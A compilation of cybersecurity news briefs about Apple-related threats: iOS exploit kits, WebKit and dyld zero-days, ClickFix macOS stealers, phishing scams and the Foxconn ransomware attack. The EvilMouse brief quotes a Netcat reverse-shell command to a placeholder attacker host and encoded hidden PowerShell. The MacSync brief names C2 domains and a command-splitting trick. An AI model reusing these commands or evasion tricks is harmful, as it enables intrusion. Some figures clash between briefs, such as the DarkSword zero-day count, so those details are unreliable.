Foxconn Recovers from Nitrogen Ransomware Attack Disrupting North American Factories Taiwanese electronics giant Foxconn has restored normal production at its North American factories following a cyberattack that disrupted operations. The company, which manufactures products for major tech firms like Apple, Google, and Microsoft, confirmed the incident but did not disclose how many of its facilities located in Wisconsin, Ohio, Texas, Virginia, Indiana, and Mexico were affected. A Foxconn spokesperson stated that its cybersecurity team activated emergency protocols to maintain production and delivery continuity, though employees at a Wisconsin plant reported Wi-Fi outages and manual workarounds starting Friday. Computers were offline, forcing staff to rely on paper records until systems were restored. The Nitrogen ransomware gang claimed responsibility for the attack, alleging it stole 8 terabytes of data, including sensitive technical files from multiple tech companies. Cybersecurity researchers link Nitrogen to the defunct Conti ransomware, describing it as a financially motivated group active since 2023. Foxconn, which reported $258.3 billion in 2025 revenue, has been a frequent ransomware target. Previous attacks include a 2024 LockBit breach on its semiconductor division and incidents in Mexico in 2020 and 2022. The latest disruption underscores the persistent cyber threats facing global manufacturing supply chains.

Massive Password Breaches in 2024–2025: What You Need to Know In 2025, cybersecurity researchers uncovered two of the largest credential leaks in history: a 16 billion-password compilation an aggregation of thousands of breaches over years and an 184 million-record database sourced from infostealer malware, containing active logins for platforms like Google, Apple, Microsoft, and Facebook. These incidents are part of an accelerating trend: password breaches are no longer isolated events but a persistent, industrial-scale threat. ### How Password Breaches Happen Attackers exploit vulnerabilities, misconfigured servers, or phishing attacks to steal credential databases from platforms. Once exfiltrated, the data is traded on dark web forums, packaged into "combo lists," and used in credential-stuffing attacks automated attempts to log into other accounts using the same stolen credentials. By the time a breach is publicly disclosed (often months later), the credentials may have already been circulating for weeks. ### Why Password Breaches Are Uniquely Dangerous Unlike general data breaches (which may expose names or payment details), password breaches give attackers direct access to accounts. Weak or reused passwords amplify the risk: a single leaked credential can compromise multiple accounts if reused. According to Verizon’s Data Breach Investigations Report, stolen credentials are the leading cause of hacking-related breaches, responsible for incidents like the Colonial Pipeline attack. ### Major Breaches in Recent Years - 2025: 16B-password compilation (multi-source aggregation); 184M-record infostealer dump. - 2024: Ticketmaster (560M records), Snowflake-linked breaches (AT&T, Santander), alleged Oracle Cloud compromise. - 2022: LastPass (encrypted vaults + unencrypted metadata stolen). - 2013–2016: Yahoo (3B accounts), Adobe (153M), LinkedIn (117M). ### How Platforms Detect Breached Passwords Google, Apple, Chrome, and Safari now include built-in breach monitoring: - Google Password Checkup: Cross-references saved credentials against a database of 4B+ compromised passwords. - Apple’s Password Monitor: Flags breached passwords in iCloud Keychain using privacy-preserving hashing. - Firefox Monitor/Have I Been Pwned (HIBP): Public tools to check email addresses against breach datasets. ### What to Do If Your Password Is Breached 1. Change the flagged password immediately and any other accounts using it. 2. Prioritize high-risk accounts (email, financial, healthcare). 3. Use a password manager (Bitwarden, 1Password, Keeper) to generate and store unique passwords. 4. Enable two-factor authentication (2FA) on critical accounts. ### Dark Web Monitoring: The Next Layer of Defense Standard tools (HIBP, Google Checkup) rely on publicly disclosed breaches, which can lag behind criminal activity. Dark web monitoring scans private forums, infostealer logs, and marketplaces to detect stolen credentials before they appear in public databases, narrowing the window for attackers to exploit them. The scale of credential exposure in 2024–2025 underscores a grim reality: most users have had passwords leaked at least once. The question is no longer if but how many times and whether proactive measures are in place to limit the damage.

Apple Warns of Active iOS Exploit Kits Coruna and DarkSword, Urges Immediate Updates Apple has issued a security advisory warning iPhone users of two advanced exploit kits Coruna and DarkSword targeting outdated iOS versions. These attacks leverage malicious web content to steal sensitive data, including credentials and cryptocurrency wallet information, through full-chain exploits. ### Coruna Exploit Kit: A Highly Engineered Threat Discovered by Google’s Threat Intelligence Group (GTIG) in February 2025, Coruna (also known as CryptoWaters) is a sophisticated iOS exploit kit containing 23 exploits across five full chains, targeting iPhones running iOS 13.0 through 17.2.1. The kit employs WebKit remote code execution (RCE), pointer authentication (PAC) bypasses, and sandbox escapes, with some exploits using non-public techniques to bypass mitigations. Key details: - Initial detection: February 2025, linked to a surveillance vendor’s customer. - Attack vectors: Malicious links, compromised websites, and watering hole attacks (e.g., Ukrainian government sites). - Threat actors: Used by UNC6353 (Ukrainian watering hole campaigns), UNC6691 (Chinese financial threat actor), and surveillance vendors. - Post-exploitation: Deploys PlasmaLoader, a stager that scans for crypto wallets, banking data, and backup phrases, exfiltrating data via encrypted C2 servers. - Evasion: Avoids devices in Lockdown Mode or private browsing; uses domain generation algorithms (DGA) seeded with "lazarus" for persistence. Apple patched the vulnerabilities in March 2026, extending protection to iOS 15 and 16 via a Critical Security Update. Devices on iOS 13 or 14 must upgrade to iOS 15+ to mitigate risks. ### DarkSword: A New, Aggressive iOS Exploit Chain Identified by Lookout Threat Labs in late 2025, DarkSword is a zero-day-heavy exploit kit targeting iOS 18.4–18.7, used in campaigns against Saudi Arabia, Turkey, Malaysia, and Ukraine. The kit relies on six vulnerabilities, including three zero-days, to achieve full device compromise with minimal user interaction. Key details: - Vulnerabilities exploited: - CVE-2025-31277 (JavaScriptCore memory corruption, CVSS 8.8) - CVE-2026-20700 (dyld PAC bypass, CVSS 8.6, zero-day) - CVE-2025-43529 (JavaScriptCore memory corruption, CVSS 8.8, zero-day) - CVE-2025-14174 (ANGLE memory corruption, CVSS 8.8, zero-day) - CVE-2025-43510 & CVE-2025-43520 (iOS kernel memory issues, CVSS 8.6) - Attackers: Linked to UNC6353, a suspected Russian-aligned group targeting Ukrainian sites; also used by surveillance vendors and nation-state actors. - Tactics: "Hit-and-run" exfiltration steals data within seconds to minutes, then cleans traces. - Targets: Crypto wallets, credentials, and financial data; observed on fake financial/crypto sites via hidden iframes. - Infrastructure: Poor obfuscation and AI-assisted code suggest reliance on third-party exploits, possibly from Russian ecosystems. ### Apple’s Response and Mitigations Apple released emergency patches on March 11, 2026, addressing the vulnerabilities in iOS 15–18. Key protections: - Latest iOS versions are immune to both exploit kits. - Lockdown Mode blocks attacks, even on older systems. - Safari’s Safe Browsing blocks known malicious domains by default. - iOS 13/14 users must upgrade to iOS 15+ and apply the Critical Security Update. ### Broader Implications The emergence of Coruna and DarkSword highlights: - Exploit proliferation: Advanced iOS exploits are now commoditized, reused by multiple threat actors (surveillance vendors, nation-states, cybercriminals). - Financial and espionage motives: Actors blend crypto theft with intelligence gathering (e.g., UNC6353’s dual targeting). - Secondary exploit markets: Zero-days are brokered and repurposed, extending their lifespan beyond initial discovery. Google and Lookout have published Indicators of Compromise (IOCs) and Yara rules to aid detection. The incidents underscore the critical need for timely iOS updates to counter evolving threats.

Apple Patches Critical WebKit Vulnerability Exposing iOS, iPadOS, and macOS Users to Data Theft Apple released an emergency security update on March 17, 2026, to fix a severe WebKit vulnerability (CVE-2026-20643) that could allow attackers to bypass browser security protections and steal sensitive user data. The flaw, discovered by security researcher Thomas Espach, affects iOS 26.3.1, iPadOS 26.3.1, and macOS 26.3.1/26.3.2, leaving devices vulnerable to web-based exploits. The vulnerability resides in the Navigation API within WebKit, the engine powering Safari and other web applications. By exploiting improperly validated inputs, attackers could circumvent the Same Origin Policy (SOP), a core security measure that prevents websites from accessing data across different domains. A successful exploit could enable threat actors to: - Extract session tokens, cookies, or login credentials from other open websites. - Perform unauthorized actions on behalf of the user, such as interacting with online banking or email accounts. - Silently exfiltrate sensitive data without user awareness. Apple addressed the issue by enhancing input validation in WebKit, preventing malicious payloads from violating cross-origin restrictions. The patch was delivered via Background Security Improvements, a system introduced to deploy critical fixes silently without requiring a full OS upgrade or device restart. This mechanism, enabled by default on devices running iOS 26.1, iPadOS 26.1, and macOS 26.1 or later, allows Apple to respond rapidly to high-risk threats while minimizing disruption. It also includes a rollback capability to revert patches if compatibility issues arise. The incident underscores the evolving sophistication of browser-based attacks and the necessity of agile patching strategies. Apple’s background update system reflects a broader shift toward continuous security delivery, ensuring users remain protected against emerging threats without manual intervention.

Google Warns of "Coruna" Vulnerabilities Targeting iPhone Users Google has issued a security alert regarding a potential cyberattack exploiting a set of vulnerabilities known as "Coruna" that could compromise iPhones. The threat involves 23 distinct security flaws that, if exploited, allow attackers to bypass iOS protections, gain deep system access, and potentially steal sensitive data including financial information, communications, and authentication credentials. The vulnerabilities enable stealthy infiltration, with attackers able to override built-in defenses and manipulate core device functions without user awareness. While the exact origin of the attack remains unclear, Google Threat Intelligence is investigating, noting the lack of clear attribution to a specific group or nation-state actor. Security firm iVerify has suggested a possible link to tools developed by or associated with the Pentagon, citing their sophistication in exploiting Apple’s system-level defenses. The discovery raises concerns about how such tools may have been repurposed or leaked for malicious use. The incident highlights the persistent risks in even widely trusted platforms, as cybersecurity teams race to identify and patch vulnerabilities before widespread exploitation occurs. Apple and independent researchers are actively monitoring the situation to assess the full scope of the threat.

Sophisticated Phishing Campaign Targets iPhone Users via Fake ChatGPT and Gemini Apps on Apple App Store A highly targeted phishing campaign is exploiting the trust in leading AI brands OpenAI’s ChatGPT and Google’s Gemini to deceive iPhone users into downloading malicious apps from Apple’s official App Store. The attack, uncovered by SpiderLabs, leverages deceptive emails posing as legitimate outreach from these platforms, directing victims to fraudulent applications disguised as AI-powered business or advertising tools. Two malicious apps GeminiAI Advertising (ID: id6759005662) and Ads GPT (ID: id6759514534) were identified on the Australian App Store storefront. Despite appearing on a trusted platform, the apps lack any genuine functionality. Instead, they immediately present a fake Facebook login screen, harvesting credentials in real time when users attempt to sign in. The stolen data grants attackers access to personal profiles, business ad accounts, and linked pages, amplifying the potential damage. This campaign marks a tactical evolution in credential theft, bypassing traditional methods like fake websites or malicious attachments in favor of infiltrating an official app marketplace. The use of the App Store perceived as a secure environment significantly lowers user skepticism, making the attack more effective. While the apps were hosted on the Australian storefront, the phishing emails targeted global users, particularly business professionals, marketers, and social media managers. The attack chain begins with a convincing email, reinforcing legitimacy at each step from the sender’s display name to the App Store listing. Once installed, the apps exploit this trust by mimicking Facebook’s login interface, leaving victims unaware of the compromise. The incident underscores the challenges of vetting applications on large-scale distribution platforms, even those with rigorous review processes. Indicators of Compromise (IoCs): - GeminiAI Advertising: `hxxps[://]apps[.]apple[.]com/au/app/geminiai-advertising/id6759005662` - Ads GPT: `hxxps[://]apps[.]apple[.]com/au/app/ads-gpt/id6759514534`

Sophisticated macOS Malware Campaign Exploits Google Ads, Claude AI, and Medium to Distribute MacSync Stealer A recent malware campaign is targeting macOS users through a multi-pronged attack leveraging sponsored Google search results, Claude AI’s public artifact feature, and fraudulent Medium articles. The operation, uncovered by cybersecurity researchers at Moonlock Lab, has exposed over 15,000 users to the MacSync information stealer, which siphons sensitive data including keychain credentials, browser data, and cryptocurrency wallets. The campaign employs two distinct variants, both using the ClickFix social engineering technique to deceive users into executing malicious commands. ### First Variant: Fake DNS Resolver via Claude AI When users search for "Online DNS resolver" on Google, a sponsored result directs them to a public Claude AI artifact titled "macOS Secure Command Execution." The fake guide masquerades as a legitimate security tool, instructing victims to paste a base64-encoded command into their Terminal. Upon execution, the command downloads a loader for MacSync from `/tmp/osalogging.zip`, which then establishes communication with a command-and-control (C2) server at `a2abotnet[.]com/dynamic`. The malware uses a hardcoded authentication token and API key, spoofs a macOS browser User-Agent string to evade detection, and exfiltrates stolen data via Apple’s `osascript` utility. Larger datasets are uploaded in chunks with retry mechanisms and exponential backoff to ensure successful transmission. After exfiltration, the malware deletes staging files to cover its tracks. ### Second Variant: Fake Disk Space Analyzer via Medium A second attack vector targets users searching for "macOS CLI disk space analyzer" through a fraudulent Medium article hosted at `apple-mac-disk-space.medium[.]com`. The article impersonates Apple’s official Support Team and delivers a similar ClickFix payload with additional obfuscation, including string concatenation tricks (e.g., `cur””l`) to bypass detection. The malicious payload is fetched from `raxelpak[.]com`. ### Evasion Tactics and Broader Implications The threat actors behind this campaign demonstrate a deep understanding of social engineering and evasion techniques, exploiting trusted platforms like Google Ads, Claude AI, and Medium to lend legitimacy to their attacks. By abusing these services, they bypass traditional security controls and reach a broader audience. The MacSync stealer remains a persistent threat, with its operators continuously refining their methods to avoid detection while maximizing data theft. The campaign underscores the growing trend of malware distributors leveraging legitimate services to propagate malicious payloads.

EvilMouse: A $44 USB Mouse That Silently Hijacks Systems Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures. Unlike suspicious USB drives, EvilMouse retains normal mouse functionality optical tracking and buttons while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds. The device executes DuckyScript-like sequences, including: - Hidden PowerShell commands (`-WindowStyle Hidden -enc`) - Base64-encoded payloads for obfuscation - Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`) - Persistence mechanisms (e.g., scheduled tasks) In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma. Security Implications EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments. Potential Defenses - USB device whitelisting (Group Policy) - Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring) - Physical port controls (Kensington locks) The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses. EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.

Apple Patches Critical Zero-Day in iOS 26.3 Exploited in Targeted Spyware Attacks On February 11, 2026, Apple released iOS 26.3 and iPadOS 26.3, addressing over 40 vulnerabilities, including a critical zero-day flaw (CVE-2026-20700) in the dyld component actively exploited in targeted attacks. Discovered by Google’s Threat Analysis Group, the memory-corruption vulnerability allows arbitrary code execution for attackers with memory-write access. The flaw affects Apple’s Dynamic Link Editor (dyld), which manages dynamic library loading across iOS, macOS, and other platforms. Due to improper state management, attackers could corrupt memory during library loading, hijacking control flow to execute malicious code. Apple confirmed the exploit was used in "extremely sophisticated attacks" against high-profile individuals, such as journalists and activists, aligning with nation-state spyware campaigns like Pegasus. The attack chain likely begins with initial access via phishing or zero-click exploits, followed by privilege escalation through dyld. While no public proof-of-concept exists, Apple’s rapid patching highlights the threat’s severity. The fix, described as "improved state management," enhances validation in dyld’s memory allocation and linking processes. Affected devices include iPhone 11 and later, recent iPad Pro, Air, and mini models. The update also patches 37+ additional vulnerabilities, including: - Kernel flaws (CVE-2026-20617/20615) enabling root escalation. - WebKit bugs leading to denial-of-service or crashes. - Lock screen bypasses in Accessibility and Photos (CVE-2026-20642). - Sandbox escape vulnerabilities for app breakouts. This marks Apple’s first zero-day patch of 2026, following seven in 2025, signaling persistent advanced threats. While the attacks remain highly targeted, public disclosure raises risks of broader exploitation. Apple’s update reinforces defenses, but enterprises are advised to enforce MDM policies and monitor for anomalies.

Sophisticated Vishing Campaign Targets Apple Pay Users in Phishing Scam A highly convincing phishing campaign is actively targeting Apple Pay users, employing deceptive emails and phone-based social engineering to steal financial and login credentials. The attack, analyzed by Malwarebytes, begins with a fraudulent email mimicking an official Apple receipt, complete with the company’s logo, a fabricated case ID, and a timestamp. The message warns of a blocked high-value purchase such as a 2025 MacBook Air and urges the recipient to call a provided support number if the alleged "appointment" to review the fraud is inconvenient. Unlike traditional phishing schemes that rely on malicious links, this campaign uses vishing (voice phishing) to manipulate victims over the phone. When contacted, scammers posing as Apple’s fraud department follow a scripted conversation, initially verifying harmless details like partial phone numbers before escalating to requests for Apple ID two-factor authentication (2FA) codes. In real time, attackers use these codes to hijack accounts, gaining access to stored data, photos, and linked payment methods. The scam’s effectiveness lies in its psychological tactics leveraging urgency, brand trust, and fabricated transaction details to bypass skepticism. Researchers emphasize that Apple never schedules fraud reviews via email or demands callbacks, and official communications always originate from verified Apple domains. Victims who fall for the scheme risk full account compromise, with attackers potentially draining linked credit cards or locking users out of their devices. The campaign underscores the growing sophistication of social engineering attacks, where human manipulation not technical exploits remains the primary vector for financial theft.

Verizon Customers Targeted in Sophisticated Fraud Scheme Involving Fake IDs and Stolen PINs A Massachusetts family fell victim to a coordinated fraud scheme after hackers gained access to their Verizon account, using stolen credentials to purchase thousands of dollars in Apple devices at two retail locations. Laura and Eric Roppolo, residents of Holland, Massachusetts, first noticed irregularities when they received an early payment receipt referencing an unfamiliar card number. Days later, they discovered unauthorized purchases of iPhones and Apple Watches at Russell Cellular stores an authorized Verizon retailer in Danvers and Malden, towns they had never visited. The breach disrupted the family’s finances for over a week, freezing their bank accounts and halting direct deposits. Verizon confirmed that its two-step verification process requiring a government-issued ID and a PIN was followed at both stores, suggesting the suspect used a fake ID and somehow obtained the Roppolos’ PIN. How the PIN was compromised remains unclear, though authorities suspect phishing, mail theft, or eavesdropping on phone conversations as potential vectors. Malden Police identified a suspect captured on security footage at both stores during the fraudulent transactions. Investigators are working to confirm the individual’s identity, while the Roppolos have raised concerns about broader security vulnerabilities that could enable similar attacks. The case highlights the growing sophistication of fraud schemes targeting telecom accounts, where stolen personal data is leveraged to bypass verification protocols.

Massive Exposed Database Containing 149 Million Credentials Discovered Online Security researcher Jeremiah Fowler uncovered a publicly accessible database containing 149 million usernames and passwords, including credentials for major platforms and sensitive systems. The unsecured collection, which was freely accessible via a web browser, included 48 million Gmail accounts, 17 million Facebook logins, 420,000 Binance credentials, 3.4 million Netflix accounts, 780,000 TikTok logins, and 100,000 OnlyFans accounts. Additionally, it held 1.5 million Microsoft Outlook, 900,000 Apple iCloud, and 1.4 million .edu credentials, along with login details for government systems and consumer bank accounts. Fowler reported the database to the Canadian hosting provider, which took it offline after nearly a month for violating its terms of service. During this period, the database continued to grow, suggesting ongoing data collection. Fowler suspects the credentials were harvested via infostealing malware, which logs keystrokes when victims enter login details on compromised sites. The discovery highlights the thriving infostealer market, where stolen credentials are sold for as little as $10 per log on the dark web. The simplicity of such malware makes it a popular tool for cybercriminals, enabling large-scale credential theft with minimal effort. The incident underscores the risks of unsecured databases and the widespread impact of infostealer-driven breaches.

Cyberattack Targets Apple Supplier in China, Raising Production Concerns In mid-December, a sophisticated cyberattack struck an undisclosed Apple subcontractor operating in China, potentially disrupting production and exposing sensitive data. While details remain scarce, the incident mirrors past disruptions—such as the 2018 malware attack on TSMC, which halted chip production for Apple—suggesting possible delays in device manufacturing. The motives behind the attack are unclear. Hackers may have sought proprietary information on Apple products or manufacturing processes, or deployed ransomware to extort the supplier, with Apple potentially pressured to intervene to avoid production slowdowns. The compromised data could range from iPhone specifications to internal operational procedures. Apple relies on a vast network of suppliers, including major players like Foxconn, Pegatron, and Wistron, but the identity of the targeted company has not been disclosed. The incident underscores the vulnerabilities in global supply chains, where even a single breach can ripple through production pipelines, impacting product availability. Further updates on the attack’s scope and impact are pending.

Apple Patches Two Zero-Day WebKit Vulnerabilities in iOS 26, Urging Immediate Updates On December 12, 2025, Apple released critical security patches for two actively exploited WebKit zero-day vulnerabilities, targeting iPhone 11 and newer devices. The flaws, linked to mercenary spyware, allowed attackers to execute arbitrary code via malicious web content posing risks even to users who avoid high-risk behavior. WebKit, the engine behind Safari and many iOS apps, represents a broad attack surface. Apple confirmed the vulnerabilities were already being exploited in the wild, primarily in highly targeted campaigns against diplomats, journalists, and executives. However, such exploits often spread beyond initial targets as tooling leaks or gets repurposed. The fixes are only available in iOS 26+, which includes new memory protections like Memory Integrity Enforcement. Despite this, adoption of iOS 26 has been slow only 4.6% of active iPhones run iOS 26.2 as of January 2026, with just 16% on any iOS 26 version. Older, unsupported devices will not receive these protections. Upgrading to iOS 26.2 also forces a device restart, which flushes memory-resident malware a common tactic used by advanced spyware to avoid persistence. Apple’s update process ensures users both patch vulnerabilities and clear potential infections in one step. The vulnerabilities also heighten risks for Apple Mail users, as malicious HTML-formatted emails could trigger exploitation. While Apple’s Lockdown Mode offers additional protection for high-value targets, the primary defense remains updating to the latest iOS version.

New ClickFix Social Engineering Campaign Targets macOS Users with Fake Troubleshooting Guides Microsoft’s Defender Security Research Team has uncovered a sophisticated cyberattack campaign leveraging a social engineering tactic called ClickFix to compromise Apple computers. Active since late 2025 and continuing into early 2026, the campaign tricks users into executing malicious commands under the guise of legitimate troubleshooting solutions. Attackers distribute fake guides on platforms like Medium, Craft, and Squarespace, offering fixes for common issues such as disk space errors or system malfunctions. Instead of providing downloads, these sites instruct users to copy and paste commands into macOS Terminal, claiming they are system utilities or quick repairs. The guides are often multilingual and appear on websites that have since been taken down or reported. Once executed, the commands bypass macOS security features like Gatekeeper, which typically only scans app bundles and disk images not direct Terminal inputs. The malware including AMOS (Atomic macOS Stealer), Macsync, and SHub Stealer then prompts users to enter their system password under the pretense of installing a "helper tool." If granted, attackers gain full access to sensitive files, settings, and credentials. The malware targets a range of high-value data, including: - iCloud and Telegram account credentials - Private documents, notes, and photos under 2 MB - Cryptocurrency wallet keys (Exodus, Ledger, Trezor) - Saved browser passwords (Chrome, Firefox) - Authentic crypto apps, which attackers replace with trojanized versions to monitor transactions and steal funds The campaign employs fileless attack techniques, using tools like curl and osascript to run malware directly in memory, evading traditional antivirus detection. Microsoft also identified a kill switch in the malware that halts execution if a Russian keyboard layout is detected. In response, Apple has introduced a security feature in macOS 26.4, which now displays a "Possible malware, Paste blocked" warning when users attempt to paste suspicious commands into Terminal. The update aims to mitigate the risk of unintentional execution of malicious scripts.

DarkSword: Advanced iOS Exploit Kit Targets iPhones in Four Countries Since November 2025, a sophisticated iOS exploit kit named DarkSword has been deployed by commercial surveillance vendors and state-sponsored threat actors to extract sensitive data from iPhone users across four countries. The attack leverages six vulnerabilities, including four zero-days, to fully compromise devices running iOS 18.4 to 18.7. The exploit chain begins with a remote code execution (RCE) vulnerability in JavaScriptCore, followed by sandbox escapes and local privilege escalation. The final payload grants attackers kernel-level access, enabling deep system control. DarkSword’s multi-stage approach highlights the growing complexity of iOS-targeted attacks, challenging the long-held assumption of iPhone security. The campaign underscores the evolving tactics of advanced threat actors, who continue to refine their methods to bypass Apple’s defenses. No further details on the affected countries or specific forensic artifacts have been disclosed.

Apple filed a lawsuit alleging that former employee Ethan Lipnik shared confidential iOS 26 development features with Michael Ramacciotti, who later disclosed them to leaker Jon Prosser via a FaceTime call. Ramacciotti accessed Lipnik’s development iPhone (containing unreleased trade secrets) while Lipnik was away, though he claims no prior conspiracy or payment agreement existed. Prosser later paid Ramacciotti $650 post-call, allegedly without Ramacciotti’s expectation. The breach involved unauthorized access to proprietary software, including unreleased iOS features, which were subsequently leaked. Ramacciotti denies tracking Lipnik’s location or retaining further confidential data, but the incident exposed Apple’s trade secrets—specifically unreleased iOS functionality—to external parties, risking competitive disadvantage and reputational harm. Apple is pursuing legal action, with Prosser facing a default judgment for non-response.

Scammers Exploit Apple’s Email Domain in Callback Phishing Attack Cybercriminals have weaponized Apple’s email notification system to launch a callback phishing campaign, tricking victims into revealing sensitive data or granting remote access to their devices. The attack leverages emails sent from Apple’s legitimate email.apple.com domain, falsely alerting recipients of an $899 iPhone purchase made via PayPal. The message includes a phone number for victims to call to "cancel" the transaction a classic callback phishing tactic. Once contacted, scammers manipulate victims into sharing personal information or installing remote access tools, enabling them to drain bank accounts or conduct fraudulent wire transfers. The campaign’s novelty lies in its abuse of Apple’s account creation process. Scammers exploit the first and last name fields during Apple ID registration, which accept excessive characters, allowing them to embed an entire phishing message. By altering the account’s shipping details, they trigger a security alert email but instead of reaching the intended recipient, it lands in the scammer’s inbox. The attackers then distribute the fraudulent emails en masse using mailing lists, a technique previously seen with Google, Amazon, and Microsoft. Apple’s systems were similarly abused in September 2023, when threat actors hijacked iCloud Calendar invites for phishing. While the method is not new, the use of a trusted domain like Apple’s amplifies the deception, making it harder for users to detect the scam. The incident underscores the ongoing risk of phishing attacks leveraging reputable brands to bypass security filters and exploit human urgency.

Apple Patches iOS Flaw Exposing "Deleted" Signal Messages in FBI Investigation Apple has released emergency security updates to fix a critical privacy flaw in iOS that allowed supposedly deleted notification data including message previews from encrypted apps like Signal to persist on iPhones and be recovered later. The vulnerability, patched in iOS 26.4.2 and iOS 18.7.8, was exploited by U.S. investigators to extract Signal messages from a suspect’s device without breaking encryption. The issue came to light after a 404 Media report revealed that the FBI recovered Signal messages from an iPhone linked to a criminal case involving vandalism and an assault on a police officer at the ICE Prairieland Detention Facility in Alvarado, Texas, in July. Despite the Signal app being deleted from the device, investigators retrieved message previews from the iPhone’s notification database, which had retained the data due to a logging bug. According to Apple’s security advisory, the flaw caused notifications marked for deletion to remain stored on the device, even after disappearing from the user interface. This could expose sensitive content, such as message text or login codes, from any app. The company addressed the issue with improved data redaction, ensuring deleted notifications are no longer recoverable. Signal acknowledged the fix in a statement, confirming that no action is required from users beyond installing the iOS update. Once applied, the patch deletes inadvertently preserved notifications and prevents future retention of such data. The company praised Apple’s swift response, emphasizing the importance of ecosystem-wide efforts to protect private communications. The incident underscores the risks of system-level data retention, even in encrypted messaging apps. While Signal’s end-to-end encryption remained intact, the flaw created a secondary record of conversations that persisted after deletion. Users are advised to update their devices to the latest iOS versions to mitigate the vulnerability.

Apple disclosed a critical zero-day vulnerability (CVE-2025-43300) in its Image I/O framework, affecting iPhones, iPads, and Macs. The flaw, an out-of-bounds write, allows attackers to corrupt memory by exploiting maliciously crafted images, potentially executing arbitrary code with elevated privileges. While initially exploited in highly targeted attacks against high-value individuals, the risk escalates as threat actors typically repurpose such vulnerabilities for mass exploitation once patched. The flaw poses a severe risk of unauthorized system access, data theft, or device compromise if left unpatched. Apple released emergency updates (iOS 18.6.2, iPadOS 18.6.2, macOS patches) to mitigate the issue, urging all users to install them immediately. The vulnerability’s nature—enabling memory manipulation and code execution—makes it a prime tool for cybercriminals to escalate attacks, from espionage to large-scale malware campaigns.

A critical sandbox escape vulnerability was discovered in multiple Apple operating systems, tracked as CVE-2025-31191. The flaw resides in the security-scoped bookmarks mechanism, which is intended to grant sandboxed applications persistent, user-approved access to files outside their containers. By exploiting a weak keychain protection model, a malicious process running inside any vulnerable sandboxed app can delete the legitimate signing secret for the ScopedBookmarkAgent and replace it with an attacker-controlled key. With the new key in place, the attacker can generate forged bookmarks for arbitrary files, inject them into the securebookmarks.plist, and bypass App Sandbox restrictions without additional user consent. This chain of actions enables unauthorized access to sensitive user data, including private documents and potentially system files, elevating privileges and paving the way for further exploitation. The proof-of-concept demonstrated by Microsoft showed an Office macro delivering the exploit, but any sandboxed app on macOS Ventura, Sequoia, Sonoma, iOS, iPadOS, or tvOS is at risk. Apple has released patches that improve state management to prevent key deletion and replacement, and users are urged to update immediately. Organizations leveraging Microsoft Defender for Endpoint can detect suspicious keychain manipulations related to this attack vector.

A critical vulnerability in iOS (CVE-2025-24091) allowed any sandboxed application or widget extension to send low-level Darwin notifications that forced devices into a “Restore in Progress” state, triggering an endless reboot loop. The exploit—just a single line of code—bricked affected iPhones and iPads running versions prior to iOS/iPadOS 18.3, rendering them unusable without a full system restore. The persistent nature of the proof-of-concept attack, implemented in a widget that automatically relaunched on restart, meant devices would immediately reenter the reboot cycle upon each reboot, effectively denying service indefinitely. End users faced downtime, data loss risk if backups were outdated, increased support calls and repair costs, and potential reputational damage for enterprises relying on vulnerable devices. Apple released iOS 18.3 to address the issue with new entitlements on Darwin notifications and awarded a $17,500 bug bounty to the researcher.

Google Project Zero researcher Jann Horn uncovered a sophisticated vulnerability in Apple’s macOS and iOS that allows attackers to bypass Address Space Layout Randomization (ASLR)—a critical memory protection mechanism—by exploiting pointer leaks in the NSKeyedArchiver serialization framework. The flaw leverages Apple’s Core Foundation framework, specifically manipulating NSDictionary hash tables and the CFNull singleton to extract memory addresses through deserialization and re-serialization of attacker-controlled data. While no real-world exploitation was confirmed, the technique could enable highly reliable ASLR bypasses, paving the way for advanced memory corruption attacks. Apple patched the issue in its March 31, 2025, security update, but the vulnerability underscores risks in pointer-based hashing and serialization security. The attack requires an app to process malicious serialized data, exposing memory layout details without traditional exploits like buffer overflows. Though theoretical, it highlights systemic weaknesses in framework-level security designs, particularly in legacy serialization mechanisms used across Apple’s ecosystem.

Apple has received a confidential order from the UK Home Office to create access into its Advanced Data Protection for iCloud, which may force them to compromise the end-to-end encryption feature or withdraw support in the UK. Complying with this could have implications for user privacy and data security worldwide if backdoor access is granted to government agencies.

Underground Telegram Marketplace Exploits Stolen iPhones via Phishing and Unlocking Tools Infoblox researchers uncovered a thriving Telegram-based black market specializing in tools and infrastructure to unlock and monetize stolen iPhones. The discovery began when a victim of phone theft received a smishing text linking to a fake Apple Find My page, designed to trick users into surrendering their passcode. Despite Apple’s Activation Lock which renders stolen iPhones unusable without the owner’s credentials over 7.35 million iPhones are stolen annually in the U.S. alone. Thieves prioritize resale value over data extraction, turning to underground markets to bypass security measures. Researchers identified over 10,000 domains tied to phishing kits and unlocking tools, many mimicking Apple’s services with near-identical interfaces. The marketplace offers Windows-based unlocking tools, FMI OFF (Find My iPhone Off) services, and iCloud Webkit phishing kits, which automate jailbreaking, extract device details (serial numbers, activation countries, Apple IDs), and generate convincing smishing messages. Some tools include AI voice calling software and prerecorded Apple support impersonations in multiple languages to enhance social engineering attacks. Prices for unlocking services range from $5 to $50, with most tools operating on a pay-as-you-go model. While no known exploits exist for iOS versions above 17.0, some sellers falsely advertise "zero-day" vulnerabilities. Researchers noted a 350% increase in DNS telemetry linked to smishing domains in 2025, indicating a growing threat. The ecosystem relies on stolen device data to craft targeted phishing campaigns, often using bots to cross-reference credentials and iCloud-linked devices. Despite claims of "forgotten passwords," the tools’ features such as FMI OFF suggest their primary use is for illicit unlocking. Some operators even include mechanisms to evade DNS blocking and Google Safe Browsing restrictions.

